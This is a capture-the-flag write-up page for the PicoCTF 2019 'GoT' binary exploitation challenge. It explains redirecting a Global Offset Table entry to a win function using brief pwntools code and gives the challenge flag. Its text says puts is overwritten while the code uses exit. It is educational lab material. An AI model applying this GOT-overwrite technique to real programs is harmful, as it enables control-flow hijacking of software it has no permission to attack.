PicoCTF-2019 Writeup
  • HHousen PicoCTF-2019 Writeup
  • Binary Exploitation
    • L1im1tL355
    • messy-malloc
    • OverFlow 2
    • CanaRy
    • NewOverFlow-1
    • NewOverFlow-2
    • sice_cream
    • seed-sPRiNG
    • leap-frog
    • GoT
    • rop64
    • rop32
    • Ghost_Diary
    • zero_to_hero
    • Challenge Name
    • Heap overflow
    • slippery-shellcode
    • AfterLife
    • SecondLife
    • stringzz
  • Cryptography
    • la cifra de
    • b00tl3gRSA2
    • b00tl3gRSA3
    • AES-ABC
    • john_pollard
    • b00tl3gRSA2
    • waves over lambda
  • Forensics
    • What Lies Within
    • m00nwalk
    • shark on wire 1
    • shark on wire 2
    • Glory of the Garden
    • pastaAAA
    • Investigative Reversing 0
    • Investigative Reversing 1
    • extensions
    • investigation_encoded_1
    • Investigative Reversing 2
    • investigation_encoded_2
    • Investigative Reversing 3
    • like1000
    • Investigative Reversing 4
    • WebNet0
    • B1g_Mac
    • m00nwalk 2
    • WebNet1
    • WhitePages
    • So Meta
    • c0rrupt
  • Web Exploitation
    • Java Script Kiddie 2
    • Empire1
    • Empire2
    • cereal hacker 1
    • Empire3
    • cereal hacker 2
    • Java Script Kiddie
    • JaWT Scratchpad
    • Irish-Name-Repo 1
    • Irish-Name-Repo 2
    • Irish-Name-Repo 3
  • Reverse Engineering
    • Time's Up, Again!
    • Forky
    • droids0
    • Challenge Name
    • droids1
    • droids2
    • droids3
    • reverse_cipher
    • droids4
    • B1ll_Gat35
    • Time's Up
    • Time's Up, For the Last Time!
    • asm1
    • asm2
    • asm3
    • asm4
  • Challenge Name
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag

Was this helpful?

Edit on Git
  1. Binary Exploitation

GoT

Previousleap-frogNextrop64

Last updated 4 years ago

Was this helpful?

Problem

You can only change one address, here is the problem: program. It is also found in /problems/got_3_4ba3deeda2ea9b203c6a6425f183e7ed on the shell server. Source.

Solution

  1. The program asks for an address to overwrite with user-supplied data. One prompt for the address and another prompt for the input value.

  2. puts and exit are the only two functions called after the write, so we need to change the behavior of one of the two functions. Because ASLR is enabled, we need to look for things that stay constant. One of these things is the Global Offset Table. The allows a C program to call libc libraries and serve as a jumping point for the program. If we modify this jumping point, we can make the program execute code at a different address than intended.

  3. So we want to select the GOT address of the puts function and overwrite it with the address of the win function. pwntools makes this easy:

     exit_got = exe.got['exit']
     win_addr = exe.symbols['win']
  4. Then we simply send the addresses over and get the flag:

     io.sendlineafter("Input address\n", str(exit_got))
     io.sendlineafter("Input value?\n", str(win_addr))
  5. Run the like so: python script.py USER=username PASSWORD=password

Flag

picoCTF{A_s0ng_0f_1C3_and_f1r3_1ef72b2d}

Program
Source
Global Offset Table
script.py